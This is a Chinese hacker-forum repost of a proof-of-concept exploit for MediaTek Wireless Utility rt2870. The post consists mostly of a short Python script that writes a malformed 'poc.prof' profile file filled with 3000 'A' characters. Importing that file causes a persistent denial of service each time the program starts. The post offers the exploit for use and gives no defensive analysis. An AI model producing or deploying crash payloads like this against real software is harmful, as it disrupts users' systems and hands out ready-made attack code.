跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

MediaTek Wirless Utility rt2870 - Denial of Service (PoC)

精选回复

发布于
# Exploit Title: MediaTek Wirless Utility rt2870 - Denial of Service (PoC)
# Autor: Lawrence Amer
# Date: 2018-09-13
# Vendor: MediaTek
# Software url: https://click.pstmrk.it/2ts/d86o2zu8ugzlg.cloudfront.net%2Fmediatek-craft%2Fdrivers%2FRT2770_2870_RT307x.zip/K94pHAI/oTs1/oC6CdN114w
# Tested on OS: Windows 7 64-bit , 32-bit

# Description: launch program then click on  Add profile setting dialog choose our generate prof file ,
# succesfully reproduce persistent Denial of service every time launch the program again .

#!/usr/bin/python

buffer ="\x41"*3000
start = "["
end = "]"
payload = start+buffer+end
try:
    f=open("poc.prof","w")
    print "[+] Creating %s Byet evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] file created !"
except:
     print "File cannot be created !"
            

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。